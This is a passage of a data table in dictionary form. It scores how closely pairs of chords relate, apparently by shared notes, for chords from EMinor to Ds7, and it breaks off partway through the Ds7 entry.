'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 0,
'FMaj7': 0,
'FsDim': 0,
'GDim': 1,
'GMinor': 2,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 0,
'BMinor': 2,
'CMaj7': 2,
'AsMaj7': 1,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 0,
},
'EMinor': {
'AMinor': 1,
'CDim': 0,
'Gs7': 0,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 2,
'Em7': 3,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 0,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 2,
'EMinor': 3,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 2,
'B7': 1,
'AMajor': 1,
'A7': 2,
'Fm7': 0,
'DsMajor': 1,
'E7': 2,
'C7': 2,
'GsMinor': 1,
'Bm7': 1,
'G7': 2,
'Asm7': 0,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 2,
'As7': 0,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 1,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 2,
'FsMaj7': 0,
'BMinor': 1,
'CMaj7': 3,
'AsMaj7': 0,
'D7': 0,
'Csm7': 2,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 0,
},
'CsMaj7': {
'AMinor': 1,
'CDim': 1,
'Gs7': 2,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 2,
'Fs7': 1,
'CMajor': 1,
'Em7': 0,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 1,
'CsMinor': 2,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 4,
'FDim': 2,
'DMinor': 1,
'FMajor': 2,
'ADim': 1,
'CMinor': 1,
'EDim': 0,
'B7': 0,
'AMajor': 1,
'A7': 1,
'Fm7': 3,
'DsMajor': 0,
'E7': 1,
'C7': 1,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 3,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 2,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 3,
'Gm7': 1,
'DDim': 2,
'CsMajor': 3,
'FMinor': 3,
'EMajor': 1,
'As7': 2,
'F7': 2,
'FMaj7': 2,
'FsDim': 1,
'GDim': 1,
'GMinor': 0,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 2,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 2,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 0,
},
'FDim': {
'AMinor': 0,
'CDim': 0,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 1,
'Fs7': 0,
'CMajor': 0,
'Em7': 1,
'Dsm7': 0,
'Gsm7': 2,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 0,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 2,
'FDim': 3,
'DMinor': 1,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 0,
'B7': 1,
'AMajor': 0,
'A7': 0,
'Fm7': 2,
'DsMajor': 0,
'E7': 2,
'C7': 0,
'GsMinor': 2,
'Bm7': 1,
'G7': 2,
'Asm7': 2,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 3,
'Gm7': 1,
'DDim': 2,
'CsMajor': 2,
'FMinor': 2,
'EMajor': 2,
'As7': 2,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 0,
'EMaj7': 2,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 0,
'Csm7': 2,
'FsMajor': 0,
'Am7': 0,
'DsMinor': 0,
},
'DMinor': {
'AMinor': 1,
'CDim': 0,
'Gs7': 0,
'GMaj7': 1,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 0,
'CMajor': 0,
'Em7': 1,
'Dsm7': 0,
'Gsm7': 0,
'DMaj7': 2,
'Dm7': 3,
'Cm7': 0,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 0,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 1,
'DMinor': 3,
'FMajor': 2,
'ADim': 1,
'CMinor': 0,
'EDim': 0,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 0,
'E7': 1,
'C7': 0,
'GsMinor': 0,
'Bm7': 2,
'G7': 2,
'Asm7': 1,
'BMajor': 0,
'Ds7': 0,
'GsMaj7': 0,
'AsMinor': 1,
'BDim': 2,
'AsMajor': 2,
'AMaj7': 1,
'DMajor': 2,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 2,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 0,
'As7': 2,
'F7': 2,
'FMaj7': 2,
'FsDim': 1,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 0,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 3,
'D7': 2,
'Csm7': 0,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 0,
},
'FMajor': {
'AMinor': 2,
'CDim': 1,
'Gs7': 1,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 0,
'CMajor': 1,
'Em7': 0,
'Dsm7': 0,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 3,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 2,
'FMajor': 3,
'ADim': 2,
'CMinor': 1,
'EDim': 0,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 2,
'DsMajor': 0,
'E7': 0,
'C7': 1,
'GsMinor': 0,
'Bm7': 1,
'G7': 1,
'Asm7': 1,
'BMajor': 0,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 1,
'DDim': 1,
'CsMajor': 1,
'FMinor': 2,
'EMajor': 0,
'As7': 1,
'F7': 3,
'FMaj7': 3,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 0,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 2,
'D7': 2,
'Csm7': 0,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 0,
},
'ADim': {
'AMinor': 2,
'CDim': 2,
'Gs7': 2,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 2,
'Fs7': 0,
'CMajor': 1,
'Em7': 0,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 2,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 2,
'ADim': 3,
'CMinor': 2,
'EDim': 0,
'B7': 2,
'AMajor': 1,
'A7': 1,
'Fm7': 2,
'DsMajor': 1,
'E7': 0,
'C7': 1,
'GsMinor': 1,
'Bm7': 1,
'G7': 0,
'Asm7': 0,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 0,
'Gm7': 0,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 0,
'As7': 0,
'F7': 3,
'FMaj7': 2,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 1,
'FsMaj7': 0,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 2,
'Csm7': 0,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 1,
},
'CMinor': {
'AMinor': 1,
'CDim': 2,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 2,
'Fs7': 0,
'CMajor': 2,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 3,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 1,
'ADim': 2,
'CMinor': 3,
'EDim': 1,
'B7': 1,
'AMajor': 0,
'A7': 1,
'Fm7': 2,
'DsMajor': 2,
'E7': 0,
'C7': 2,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 0,
'BMajor': 1,
'Ds7': 2,
'GsMaj7': 3,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 0,
'DMajor': 0,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 0,
'Gm7': 1,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 0,
'As7': 0,
'F7': 2,
'FMaj7': 1,
'FsDim': 1,
'GDim': 1,
'GMinor': 1,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 0,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 0,
'D7': 1,
'Csm7': 0,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 1,
},
'EDim': {
'AMinor': 1,
'CDim': 0,
'Gs7': 0,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 2,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 0,
'Dm7': 0,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 0,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 3,
'B7': 0,
'AMajor': 1,
'A7': 2,
'Fm7': 0,
'DsMajor': 2,
'E7': 1,
'C7': 3,
'GsMinor': 0,
'Bm7': 0,
'G7': 1,
'Asm7': 1,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 1,
'Cs7': 0,
'Gm7': 2,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 2,
'GMinor': 2,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 1,
'D7': 0,
'Csm7': 1,
'FsMajor': 1,
'Am7': 2,
'DsMinor': 1,
},
'B7': {
'AMinor': 1,
'CDim': 2,
'Gs7': 2,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 3,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 3,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 1,
'FMajor': 1,
'ADim': 2,
'CMinor': 1,
'EDim': 0,
'B7': 4,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 1,
'E7': 1,
'C7': 0,
'GsMinor': 2,
'Bm7': 3,
'G7': 1,
'Asm7': 0,
'BMajor': 3,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 2,
'AsDim': 0,
'Fsm7': 2,
'Cs7': 1,
'Gm7': 0,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 0,
'F7': 2,
'FMaj7': 1,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 3,
'EMaj7': 2,
'FsMaj7': 1,
'BMinor': 2,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 2,
'Csm7': 1,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 2,
},
'AMajor': {
'AMinor': 2,
'CDim': 0,
'Gs7': 0,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 1,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 2,
'FsMinor': 2,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 1,
'ADim': 1,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 3,
'A7': 3,
'Fm7': 0,
'DsMajor': 0,
'E7': 1,
'C7': 1,
'GsMinor': 0,
'Bm7': 1,
'G7': 0,
'Asm7': 1,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 0,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 3,
'DMajor': 1,
'AsDim': 2,
'Fsm7': 3,
'Cs7': 1,
'Gm7': 0,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 1,
'As7': 0,
'F7': 1,
'FMaj7': 2,
'FsDim': 1,
'GDim': 1,
'GMinor': 0,
'CsDim': 2,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 2,
'FsMajor': 1,
'Am7': 2,
'DsMinor': 0,
},
'A7': {
'AMinor': 2,
'CDim': 0,
'Gs7': 0,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 2,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 2,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 0,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 1,
'ADim': 1,
'CMinor': 1,
'EDim': 2,
'B7': 1,
'AMajor': 3,
'A7': 4,
'Fm7': 0,
'DsMajor': 1,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 1,
'G7': 1,
'Asm7': 1,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 3,
'DMajor': 1,
'AsDim': 2,
'Fsm7': 3,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 1,
'As7': 0,
'F7': 1,
'FMaj7': 2,
'FsDim': 1,
'GDim': 2,
'GMinor': 1,
'CsDim': 3,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 1,
'D7': 1,
'Csm7': 2,
'FsMajor': 1,
'Am7': 3,
'DsMinor': 0,
},
'Fm7': {
'AMinor': 1,
'CDim': 2,
'Gs7': 3,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 3,
'Fs7': 0,
'CMajor': 1,
'Em7': 0,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 0,
'Dm7': 2,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 3,
'FDim': 2,
'DMinor': 1,
'FMajor': 2,
'ADim': 2,
'CMinor': 2,
'EDim': 0,
'B7': 1,
'AMajor': 0,
'A7': 0,
'Fm7': 4,
'DsMajor': 1,
'E7': 1,
'C7': 1,
'GsMinor': 2,
'Bm7': 0,
'G7': 1,
'Asm7': 2,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 3,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 1,
'DDim': 2,
'CsMajor': 2,
'FMinor': 3,
'EMajor': 1,
'As7': 2,
'F7': 3,
'FMaj7': 2,
'FsDim': 1,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 2,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 1,
},
'DsMajor': {
'AMinor': 0,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 1,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 1,
'DMaj7': 0,
'Dm7': 0,
'Cm7': 3,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 3,
'BMaj7': 2,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 2,
'EDim': 2,
'B7': 1,
'AMajor': 0,
'A7': 1,
'Fm7': 1,
'DsMajor': 3,
'E7': 0,
'C7': 2,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 1,
'BMajor': 1,
'Ds7': 3,
'GsMaj7': 2,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 0,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 0,
'Cs7': 0,
'Gm7': 2,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 1,
'FMaj7': 0,
'FsDim': 0,
'GDim': 2,
'GMinor': 2,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 0,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 2,
},
'E7': {
'AMinor': 1,
'CDim': 0,
'Gs7': 1,
'GMaj7': 2,
'GsDim': 3,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 1,
'Em7': 3,
'Dsm7': 0,
'Gsm7': 2,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 2,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 2,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 1,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 0,
'E7': 4,
'C7': 1,
'GsMinor': 2,
'Bm7': 2,
'G7': 2,
'Asm7': 1,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 2,
'Gm7': 1,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 3,
'As7': 2,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 0,
'GMinor': 1,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 3,
'FsMaj7': 0,
'BMinor': 2,
'CMaj7': 2,
'AsMaj7': 1,
'D7': 1,
'Csm7': 3,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 0,
},
'C7': {
'AMinor': 2,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 3,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 3,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 1,
'ADim': 1,
'CMinor': 2,
'EDim': 3,
'B7': 0,
'AMajor': 1,
'A7': 2,
'Fm7': 1,
'DsMajor': 2,
'E7': 1,
'C7': 4,
'GsMinor': 0,
'Bm7': 0,
'G7': 1,
'Asm7': 1,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 2,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 1,
'Cs7': 0,
'Gm7': 2,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 1,
'As7': 1,
'F7': 1,
'FMaj7': 2,
'FsDim': 1,
'GDim': 2,
'GMinor': 2,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 3,
'AsMaj7': 1,
'D7': 1,
'Csm7': 1,
'FsMajor': 1,
'Am7': 3,
'DsMinor': 1,
},
'GsMinor': {
'AMinor': 0,
'CDim': 1,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 2,
'Fs7': 0,
'CMajor': 0,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 3,
'DMaj7': 0,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 1,
'EDim': 0,
'B7': 2,
'AMajor': 0,
'A7': 0,
'Fm7': 2,
'DsMajor': 1,
'E7': 2,
'C7': 0,
'GsMinor': 3,
'Bm7': 1,
'G7': 1,
'Asm7': 1,
'BMajor': 2,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 0,
'DDim': 1,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 2,
'As7': 1,
'F7': 1,
'FMaj7': 0,
'FsDim': 0,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 3,
'FsMaj7': 0,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 0,
'D7': 0,
'Csm7': 2,
'FsMajor': 0,
'Am7': 0,
'DsMinor': 1,
},
'Bm7': {
'AMinor': 1,
'CDim': 1,
'Gs7': 1,
'GMaj7': 3,
'GsDim': 2,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 0,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 3,
'Dm7': 2,
'Cm7': 0,
'CsMinor': 0,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 2,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 2,
'FMajor': 1,
'ADim': 1,
'CMinor': 0,
'EDim': 0,
'B7': 3,
'AMajor': 1,
'A7': 1,
'Fm7': 0,
'DsMajor': 0,
'E7': 2,
'C7': 0,
'GsMinor': 1,
'Bm7': 4,
'G7': 2,
'Asm7': 0,
'BMajor': 2,
'Ds7': 0,
'GsMaj7': 0,
'AsMinor': 0,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 3,
'AsDim': 0,
'Fsm7': 2,
'Cs7': 1,
'Gm7': 1,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 1,
'FMaj7': 1,
'FsDim': 2,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 3,
'CMaj7': 1,
'AsMaj7': 2,
'D7': 3,
'Csm7': 1,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 1,
},
'G7': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 3,
'GsDim': 2,
'GsMajor': 0,
'Fs7': 0,
'CMajor': 1,
'Em7': 3,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 3,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 2,
'FMajor': 1,
'ADim': 0,
'CMinor': 1,
'EDim': 1,
'B7': 1,
'AMajor': 0,
'A7': 1,
'Fm7': 1,
'DsMajor': 1,
'E7': 2,
'C7': 1,
'GsMinor': 1,
'Bm7': 2,
'G7': 4,
'Asm7': 1,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 3,
'AsMajor': 2,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 3,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 1,
'As7': 2,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 2,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 2,
'CMaj7': 2,
'AsMaj7': 2,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 0,
},
'Asm7': {
'AMinor': 0,
'CDim': 0,
'Gs7': 1,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 0,
'Em7': 0,
'Dsm7': 2,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 2,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 3,
'FDim': 2,
'DMinor': 1,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 0,
'AMajor': 1,
'A7': 1,
'Fm7': 2,
'DsMajor': 1,
'E7': 1,
'C7': 1,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 4,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 3,
'BDim': 1,
'AsMajor': 2,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 1,
'Cs7': 3,
'Gm7': 2,
'DDim': 2,
'CsMajor': 3,
'FMinor': 2,
'EMajor': 1,
'As7': 3,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 2,
'GMinor': 1,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 3,
'BMinor': 0,
'CMaj7': 0,
'AsMaj7': 2,
'D7': 0,
'Csm7': 2,
'FsMajor': 2,
'Am7': 0,
'DsMinor': 1,
},
'BMajor': {
'AMinor': 0,
'CDim': 2,
'Gs7': 2,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 3,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 3,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 1,
'EDim': 0,
'B7': 3,
'AMajor': 0,
'A7': 0,
'Fm7': 1,
'DsMajor': 1,
'E7': 1,
'C7': 0,
'GsMinor': 2,
'Bm7': 2,
'G7': 1,
'Asm7': 0,
'BMajor': 3,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 0,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 0,
'F7': 1,
'FMaj7': 0,
'FsDim': 1,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 2,
'FsMaj7': 1,
'BMinor': 2,
'CMaj7': 1,
'AsMaj7': 0,
'D7': 1,
'Csm7': 1,
'FsMajor': 1,
'Am7': 0,
'DsMinor': 2,
},
'Ds7': {
'AMinor': 0,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 1,
'Em7': 1,
